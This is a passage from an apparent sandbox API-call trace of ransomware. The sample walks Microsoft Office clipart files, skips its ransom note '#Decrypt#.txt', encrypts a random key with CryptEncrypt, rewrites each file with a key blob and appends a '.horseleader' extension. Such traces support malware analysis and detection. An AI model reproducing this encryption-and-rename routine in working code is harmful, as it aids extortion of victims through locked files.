lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x17ac, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04117_.WMF", cAlternateFileName="")) returned 1 [0252.922] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="Windows") returned -1 [0252.922] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 67 [0252.922] StrStrIW (lpFirst="AN04117_.WMF", lpSrch=".horseleader") returned 0x0 [0252.922] lstrcmpW (lpString1="AN04117_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.922] lstrcmpW (lpString1="AN04117_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.922] lstrlenW (lpString=".testttjffg") returned 11 [0252.923] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.923] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.923] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.923] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 67 [0252.924] StrStrW 
(lpFirst="AN04117_.WMF", lpSrch=".txt") returned 0x0 [0252.924] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6060) returned 1 [0252.924] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x17ac, lpOverlapped=0x0) returned 1 [0252.926] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe854, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.926] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x17ac, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x17ac, lpOverlapped=0x0) returned 1 [0252.926] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.926] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.926] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.926] CloseHandle (hObject=0x158) returned 1 [0252.926] GetProcessHeap () returned 0x780000 [0252.926] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.926] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.horseleader") returned 79 [0252.927] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\an04117_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.horseleader")) returned 1 [0252.927] GetProcessHeap () returned 0x780000 [0252.927] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.927] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04134_.WMF", cAlternateFileName="")) returned 1 [0252.927] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="Windows") returned -1 [0252.927] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 67 [0252.927] StrStrIW (lpFirst="AN04134_.WMF", lpSrch=".horseleader") returned 0x0 [0252.927] lstrcmpW (lpString1="AN04134_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.927] lstrcmpW (lpString1="AN04134_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.927] lstrlenW (lpString=".testttjffg") returned 11 [0252.928] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.928] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.928] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.928] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.928] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 67 [0252.928] StrStrW (lpFirst="AN04134_.WMF", lpSrch=".txt") returned 0x0 [0252.928] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3416) returned 1 [0252.928] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd58, lpOverlapped=0x0) returned 1 [0252.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.930] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd58, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd58, lpOverlapped=0x0) returned 1 [0252.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.930] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.930] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.931] CloseHandle (hObject=0x158) returned 1 [0252.931] GetProcessHeap () returned 0x780000 [0252.931] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.931] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.horseleader") returned 79 [0252.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.horseleader")) returned 1 [0252.932] GetProcessHeap () returned 0x780000 [0252.932] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.932] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa4c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04174_.WMF", cAlternateFileName="")) returned 1 [0252.932] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="Windows") returned -1 [0252.932] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 67 [0252.932] StrStrIW (lpFirst="AN04174_.WMF", lpSrch=".horseleader") returned 0x0 [0252.932] lstrcmpW (lpString1="AN04174_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.932] lstrcmpW (lpString1="AN04174_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.932] lstrlenW (lpString=".testttjffg") returned 11 [0252.932] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.932] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.932] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.934] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 67 [0252.934] StrStrW (lpFirst="AN04174_.WMF", lpSrch=".txt") returned 0x0 [0252.934] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2636) returned 1 [0252.934] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xa4c, lpOverlapped=0x0) returned 1 [0252.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff5b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.936] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xa4c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xa4c, lpOverlapped=0x0) returned 1 [0252.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.937] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | 
out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.937] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.937] CloseHandle (hObject=0x158) returned 1 [0252.937] GetProcessHeap () returned 0x780000 [0252.937] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.937] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.horseleader") returned 79 [0252.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.horseleader")) returned 1 [0252.938] GetProcessHeap () returned 0x780000 [0252.938] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.938] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x19ec, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04191_.WMF", cAlternateFileName="")) returned 1 [0252.938] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="Windows") returned -1 [0252.938] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 67 [0252.938] StrStrIW (lpFirst="AN04191_.WMF", lpSrch=".horseleader") returned 0x0 [0252.938] lstrcmpW (lpString1="AN04191_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.938] lstrcmpW (lpString1="AN04191_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.938] lstrlenW (lpString=".testttjffg") returned 11 [0252.939] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.939] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.939] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.939] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 67 [0252.939] StrStrW (lpFirst="AN04191_.WMF", lpSrch=".txt") returned 0x0 [0252.939] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6636) returned 1 [0252.940] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x19ec, lpOverlapped=0x0) returned 1 [0252.942] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe614, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.942] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x19ec, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x19ec, lpOverlapped=0x0) returned 1 [0252.943] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.943] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.943] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.943] CloseHandle (hObject=0x158) returned 1 [0252.943] GetProcessHeap () returned 0x780000 [0252.943] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.943] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.horseleader") returned 79 [0252.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf.horseleader")) returned 1 [0252.945] GetProcessHeap () returned 0x780000 [0252.945] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.945] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1204, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04195_.WMF", cAlternateFileName="")) returned 1 [0252.945] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="Windows") returned -1 [0252.945] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 67 [0252.945] StrStrIW (lpFirst="AN04195_.WMF", lpSrch=".horseleader") returned 0x0 [0252.945] lstrcmpW (lpString1="AN04195_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.945] lstrcmpW (lpString1="AN04195_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.945] lstrlenW (lpString=".testttjffg") returned 11 [0252.945] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.945] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.945] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.946] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 67 [0252.946] StrStrW (lpFirst="AN04195_.WMF", lpSrch=".txt") returned 0x0 [0252.946] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4612) returned 1 [0252.946] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1204, lpOverlapped=0x0) returned 1 [0252.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffedfc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.949] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1204, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1204, lpOverlapped=0x0) returned 1 [0252.950] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.950] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.950] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.950] CloseHandle (hObject=0x158) returned 1 [0252.950] GetProcessHeap () returned 0x780000 [0252.950] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.950] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.horseleader") returned 79 [0252.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.horseleader" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\an04195_.wmf.horseleader")) returned 1 [0252.951] GetProcessHeap () returned 0x780000 [0252.952] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.952] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04196_.WMF", cAlternateFileName="")) returned 1 [0252.952] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="Windows") returned -1 [0252.952] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 67 [0252.952] StrStrIW (lpFirst="AN04196_.WMF", lpSrch=".horseleader") returned 0x0 [0252.952] lstrcmpW (lpString1="AN04196_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.952] lstrcmpW (lpString1="AN04196_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.952] lstrlenW (lpString=".testttjffg") returned 11 [0252.952] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.952] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.952] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.952] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 67 [0252.954] StrStrW (lpFirst="AN04196_.WMF", lpSrch=".txt") returned 0x0 [0252.954] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3144) returned 1 [0252.954] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xc48, lpOverlapped=0x0) returned 1 [0252.970] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff3b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.970] 